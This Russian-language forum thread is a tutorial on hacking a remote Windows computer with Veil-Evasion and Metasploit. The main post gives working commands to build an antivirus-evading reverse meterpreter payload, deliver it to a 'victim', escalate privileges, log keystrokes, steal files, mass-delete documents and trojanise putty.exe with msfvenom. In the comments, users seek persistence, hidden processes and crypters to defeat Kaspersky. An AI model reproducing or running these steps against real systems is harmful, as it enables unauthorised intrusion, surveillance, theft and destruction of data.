• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: Подскажи пожалуйста, как сделать чтобы с генерируемый файл в veil постоянно запускался на компьютере жерты(после выключение компьютера), и был не убиваем в диспетчере задач .
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Vander: Подскажи пожалуйста, как сделать чтобы с генерируемый файл в veil постоянно запускался на компьютере жерты(после выключение компьютера), и был не убиваем в диспетчере задач .
Напиши скрипт небольшой для этого. В ЛС могу пример наводящий сбросить. Перед этим обойти UAC, и закинуть уже другой пайлоад. exe.шник только стартом обычно служит.
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: Как все сложно..Если бы я еще умел писать (эти скрипты). А с один файлом с генерированным в veil нельзя все это сделать ? Если несложно ,скинь пожалуйста пример в личку.
 
C

cacaocaca

Veil is detected for any av now it is good just if the victim do no have installed AV some year ago was good veil when still anyone scan the payload on virustotal i think that the principal problem is virustotal so if you create fud with c python pyinstaller for 5 days is fud but afther you can throw it in the trash and if you have make so the persistence on reg setval reg queryval you lose so your persistence so the first thing is bypass virustotal afther for persistence no is one good idea use the exe but use ssh so you can stay secure av do no detected it . Answer me if i wrong i m no expert .
 
H

hdmoor

вопросы по материалу:

1. Какие ещё есть в наличии программы, схожие функционалом с Veil-Evasion?
2. О какой катапульте там идёт речь и что за этим стоит?
[*] VEIL_CATAPULT_PATH = /root/Veil-Catapult/
[*] Path '/usr/share/veil-output/catapult/' Created
[*] CATAPULT_RESOURCE_PATH = /usr/share/veil-output/catapult/

3. перед тем как вводить list может имеет смысл сперва нажать update?
... и вероятно checkvt неплохая фича где можно хэш сопоставить с VirusTotal, но почему то вижу это:
[!] Error: hash list /usr/share/veil-output/hashes.txt not found
...подозреваю нужен лист с этими хэшами что б лежал в означенной папке...где взять/берут? и как это работает? (сопоставление хэшей)
...по команде list 51 спецэфикпэйлоад, если кто с другими нагрузками работал не могли бы осветить резалты?...ну или просто посвятить что там за нагрузки...думаю отвечая на мои вопросы можно целый пост отмочить...

4. "(для незащищённого HTTP — 80)" - в этом случае и нагрузка тогда наверно 30-ая, а не 32-ая
...вижу такое: LPORT 8443 Port of the Metasploit handler
вопросы: что это за 8-ка которую подставил метасплоит в цифре 8443, когда у ТС фигурирует 443?
c9b81c4a0af4.png

5. созданное добро весит 3,5 мб. на этом прекратил исследование и отсюда разнородные вопросы
...самый тяжёлый зверёк с учётом всех опций, коих тьма, у ДаркомаетРЭТ (окна) весит 657 кб. и это как бы много, потому что есть ещё фича содеять лоадер 2-8 кб. и уже потом по нему заливать основное тело нашего добра)) (кстати знаю это в теории что типа в конфиги лоадера надо адрес хоста указать откуда он зальётся в заражённую машину - но как это сделать пока не дошли мозги, может кто растолкует и осветит эту тему с лоадерами или тут только по линуксу и с формальной точки белошляпного пентеста всё?..

...если подходить реально а не пентестетически то возникает вопрос как такого огромного зверя 3.5мб всуропить цели? какие ещё форматы можно использовать кроме exe-шника что бы проникнуть на машину к цели ворд, пдф? как?
 
Последнее редактирование модератором:

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
вопросы по материалу:

1. Какие ещё есть в наличии программы, схожие функционалом с Veil-Evasion?
2. О какой катапульте там идёт речь и что за этим стоит?
VEIL_CATAPULT_PATH = /root/Veil-Catapult/
Path '/usr/share/veil-output/catapult/' Created
CATAPULT_RESOURCE_PATH = /usr/share/veil-output/catapult/

3. перед тем как вводить list может имеет смысл сперва нажать update?
... и вероятно checkvt неплохая фича где можно хэш сопоставить с VirusTotal, но почему то вижу это:
[!] Error: hash list /usr/share/veil-output/hashes.txt not found
...подозреваю нужен лист с этими хэшами что б лежал в означенной папке...где взять/берут? и как это работает? (сопоставление хэшей)
...по команде list 51 спецэфикпэйлоад, если кто с другими нагрузками работал не могли бы осветить резалты?...ну или просто посвятить что там за нагрузки...думаю отвечая на мои вопросы можно целый пост отмочить...

4. "(для незащищённого HTTP — 80)" - в этом случае и нагрузка тогда наверно 30-ая, а не 32-ая
...вижу такое: LPORT 8443 Port of the Metasploit handler
вопросы: что это за 8-ка которую подставил метасплоит в цифре 8443, когда у ТС фигурирует 443?
c9b81c4a0af4.png

5. созданное добро весит 3,5 мб. на этом прекратил исследование и отсюда разнородные вопросы
...самый тяжёлый зверёк с учётом всех опций, коих тьма, у ДаркомаетРЭТ (окна) весит 657 кб. и это как бы много, потому что есть ещё фича содеять лоадер 2-8 кб. и уже потом по нему заливать основное тело нашего добра)) (кстати знаю это в теории что типа в конфиги лоадера надо адрес хоста указать откуда он зальётся в заражённую машину - но как это сделать пока не дошли мозги, может кто растолкует и осветит эту тему с лоадерами или тут только по линуксу и с формальной точки белошляпного пентеста всё?..

...если подходить реально а не пентестетически то возникает вопрос как такого огромного зверя 3.5мб всуропить цели? какие ещё форматы можно использовать кроме exe-шника что бы проникнуть на машину к цели ворд, пдф? как?
Вы можете любой порт сконфигурировать.И не обязательно соединение устанавливать по http , мне допустим больше нравиться https.Что касаемо форматов, то все зависит от вашей фантазии..exe это как один из примеров, можно и bat,js,php,(правда придется использовать другие инструменты и техники) итд.Пентест сводиться не только к закидыванию зловреда жертве,это и соц инженерия , это анализ уязвимостей...
 
Последнее редактирование:
  • Нравится
Реакции: Vander
R

run4w4y

Драсьте, когда делаю команду setup.sh -c открывается инсталер Питона (Версия 2.7.5), сам инсталер для виндовса-то, но думаю раз требует установить, то установлю. Сначала там спрашивает установить для всех юзеров или только для меня, потом надо выбрать место, где будут храниться файлы питона, там, вроде бы, всё по дефолту правильно стоит (C:/Python27/), но когда нажимаю 'next', абсолютно ничего не происходит, что ж теперь делать? Второй день лажу в инете и ничего по этому поводу не нашел. Заранее спасибо за ответ
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: Есть ли возможность скрыть процесс(может прога какая нибудь есть) с генерированного файла в veil в диспетчере задач?
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Люди, с генерированным файлом (вирусом) в Veil реально ли обойти антивирус ? Сколько не пробую ..с генерировать файл .. ни как не получается обойти касперского ..
 
H

hdmoor

Люди, с генерированным файлом (вирусом) в Veil реально ли обойти антивирус ? Сколько не пробую ..с генерировать файл .. ни как не получается обойти касперского ..
пополось в сети...как подсказка
 
Последнее редактирование модератором:
  • Нравится
Реакции: thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
Есть ли здесь у кого нибудь опыт работы с криптором Shellter ? Реально ли с помощью него обойти касперского,доктор веба ?

Люди, подскажи, какие есть более менее рабочие крипторы .
 
Последнее редактирование модератором:
  • Нравится
Реакции: Сергей Попов
H

hdmoor

Есть ли здесь у кого нибудь опыт работы с криптором Shellter ? Реально ли с помощью него обойти касперского,доктор веба ?

Люди, подскажи, какие есть более менее рабочие крипторы .
годный криптор, ещё инфы, - один из настоятельных и злободневных вопросов стоящих перед начинающими пентестерами...но что бы найти на форумах рабочий криптор ты должен будешь ещё выполнить "антинуб" (защита от новичка-дурачка сливающего криптор на ВТ (Virus Total))...подготовься через гугл в этой связи, мой совет....
 
  • Нравится
Реакции: thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
hdmoor: У меня как новичка в этом деле ,возник очередной вопрос.. Для чего современным антивирусам нужно соединение с интернетом (ну кроме того чтобы обновить сигнатуру ,базу данных) ? Так же интересно ,как долго может оставаться не обнаруженным вирус ,при условии ,что с генерированный файл (вирус)в крипторе не будет слит в virus total и тому подобное ?
 

e.exploit

Green Team
11.09.2016
21
9
BIT
2
Смысл использования Veil-Evasion, а не только Metasploit в том, что стандартный антивирус винды не палит?
 

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: По моему толку от криптования в veil не особо есть. Сколько не пробовал обойти защиту касперского ...них.. не обходит.. Или может я ...что то делаю не так ?
 

e.exploit

Green Team
11.09.2016
21
9
BIT
2
Vander: По моему толку от криптования в veil не особо есть. Сколько не пробовал обойти защиту касперского ...них.. не обходит.. Или может я ...что то делаю не так ?
Используй дополнительно крипторы и не проверяй на VirusTotal и подобных, которые отправляют отчеты в антивирусные компании.
 
  • Нравится
Реакции: Mixa
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!